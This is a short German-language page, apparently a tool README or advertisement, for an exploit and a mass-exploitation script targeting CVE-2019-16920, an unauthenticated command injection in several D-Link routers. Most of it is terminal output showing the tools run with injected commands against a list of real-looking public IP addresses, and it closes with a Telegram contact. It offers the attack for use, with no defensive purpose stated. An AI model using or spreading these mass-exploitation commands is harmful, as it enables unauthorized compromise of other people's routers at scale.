
Exploit und Massen-Pwn3r für CVE-2019-16920
Die Schwachstelle wurde in der neuesten Firmware der folgenden D-Link-Produkte gefunden: DIR-655 DIR-866L DIR-652 DHP-1565
Eine nicht authentifizierte Remote-Codeausführung tritt bei D-Link-Produkten wie DIR-655C, DIR-866L, DIR-652 und DHP-1565 auf. Das Problem tritt auf, wenn der Angreifer eine beliebige Eingabe an ein „PingTest“-Geräte-Common-Gateway-Interface sendet, was zu einer allgemeinen Injektion führen kann. Ein Angreifer, der die Befehlsinjektion erfolgreich auslöst, kann das gesamte System kompromittieren. Später wurde unabhängig festgestellt, dass auch diese betroffen sind: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 und DIR-825.
root@kali:~# python3 CVE-2019-16920.py 195.208.166.41 8081 ls
[*]Sending payload
[*]Exploited!
root@kali:~#
root@kali:~# python3 CVE-2019-16920-MassPwn3r.py bots.txt 8081 id
[*]Exploiting: 195.208.166.41
[!]Unable to connect to host
[!]Unable to connect to host
[*]Exploiting: 83.243.166.37
[*]Exploiting: 74.95.133.33
[*]Exploiting: 97.89.64.118
[*]Exploiting: 66.162.68.154
[!]Unable to connect to host
[*]Exploiting: 72.47.152.161
[*]Exploiting: 97.93.250.209
[*]Exploiting: 183.207.196.64
root@kali:~#
Telegram:@eth_hacker0x18